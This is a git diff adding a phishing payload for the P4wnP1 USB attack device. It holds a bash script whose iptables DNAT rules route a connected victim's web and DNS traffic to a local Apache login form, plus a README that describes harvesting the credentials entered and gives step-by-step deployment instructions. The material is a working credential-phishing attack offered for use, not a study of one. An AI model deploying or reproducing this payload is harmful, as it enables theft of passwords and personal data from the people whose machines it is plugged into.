+
+
+
+
diff --git a/payloads/Captive_Portal/Apache/license.txt b/payloads/Captive_Portal/Apache/license.txt
new file mode 100644
index 0000000..d07ef55
--- /dev/null
+++ b/payloads/Captive_Portal/Apache/license.txt
@@ -0,0 +1,12 @@
+
+
+
diff --git a/payloads/Captive_Portal/Apache/recieve.php b/payloads/Captive_Portal/Apache/recieve.php
new file mode 100644
index 0000000..0153cc1
--- /dev/null
+++ b/payloads/Captive_Portal/Apache/recieve.php
@@ -0,0 +1 @@
+no post data to process
\ No newline at end of file
diff --git a/payloads/Captive_Portal/Captiveportal.txt b/payloads/Captive_Portal/Captiveportal.txt
new file mode 100644
index 0000000..b4212ae
--- /dev/null
+++ b/payloads/Captive_Portal/Captiveportal.txt
@@ -0,0 +1,51 @@
+# This file is part of P4wnP1.
+#
+# Copyright (c) 2017, Marcus Mengs.
+#
+# P4wnP1 is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# P4wnP1 is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with P4wnP1. If not, see .
+
+
+#Author: Briskat
+#Based on Bash bunny payload by Sebastian Kinne 'Sebkinne'
+
+#=================================
+USE_ECM=true # Linux / MacOS ethernet support
+USE_RNDIS=true # Enables USB Ethernet Gadget
+USE_HID=true # If you ever want to use ducky scripts with this payload
+ROUTE_SPOOF=true # Makes IP of P4wnP1 the default gateway on the victim
+#==================================
+
+function setupNetworking() {
+ echo 1 > /proc/sys/net/ipv4/ip_forward
+ iptables -I INPUT -i usb1 -p udp --dport 443 -j DROP
+ iptables -I FORWARD -i usb1 -p udp --dport 53 -j ACCEPT
+ iptables -I FORWARD -i usb1 -p udp --sport 53 -j ACCEPT
+ iptables -I INPUT -i usb0 -p udp --dport 443 -j DROP
+ iptables -I FORWARD -i usb0 -p udp --dport 53 -j ACCEPT
+ iptables -I FORWARD -i usb0 -p udp --sport 53 -j ACCEPT
+ iptables -t nat -A PREROUTING -i usb1 -p tcp --dport 443 -j DNAT --to-destination $IF_IP:80
+ iptables -t nat -A PREROUTING -i usb1 -p tcp --dport 80 -j DNAT --to-destination $IF_IP:80
+ iptables -t nat -A PREROUTING -i usb1 -p udp --dport 53 -j DNAT --to-destination $IF_IP:53
+ iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 443 -j DNAT --to-destination $IF_IP:80
+ iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j DNAT --to-destination $IF_IP:80
+ iptables -t nat -A PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to-destination $IF_IP:53
+ iptables -t nat -A POSTROUTING -j MASQUERADE
+}
+
+service apache2 start # Starts apache (must be installed, check out readme for more info)Turn on webserver
+setupNetworking # Calls function written above to redirect all network traffic (needs more work)
+led_blink 3 # blinks led on pi 3 times in a loop
+
+
+
diff --git a/payloads/Captive_Portal/README.md b/payloads/Captive_Portal/README.md
new file mode 100644
index 0000000..35bccae
--- /dev/null
+++ b/payloads/Captive_Portal/README.md
@@ -0,0 +1,38 @@
+This is a phishing payload for P4wnP1.
+
+Author : Brisk4t (https://github.com/Brisk4t)
+
+Credits :
+
+Sebastian Kinne - Sebkinne :(https://github.com/sebkinne)
+
+Stackoverflow's Floby : https://stackoverflow.com/users/1946228/floby
+
+Ayu : https://codepen.io/Mongeed/pen/IuBLt
+
+P4wnP1 is made by Mame82 : https://github.com/mame82
+
+######################################################
+
+What does it do :
+
+1. Set's up an apache server with an html form page with username and data fields
+2. Redirects all traffic on victim to this page (so google.com goes to your phishing page)
+3. Saves collected data to text file using php
+4. Comepletely owns victim.
+
+######################################################
+
+Setup
+
+1. Have P4wnP1 (i know, could never guess). Instructions here : https://github.com/mame82/P4wnP1
+2. Install apache2 and PHP. Paste the following into terminal : sudo apt-get install apache2 php7.0 libapache2-mod-php7.0 -y
+3. Copy contents of 'Apache' folder of this repo into /var/www/html (replce the original index.html)
+4. Copy the Captive_Portal folder to P4wnP1/payloads
+5. Add following line to setup.cfg : PAYLOAD=Captive_Portal/Captiveportal.txt
+6. Comment out all other payloads in setup.cfg
+7. Reboot P4wnP1
+
+If this is too much reading for you, video coming soon.
+
+######################################################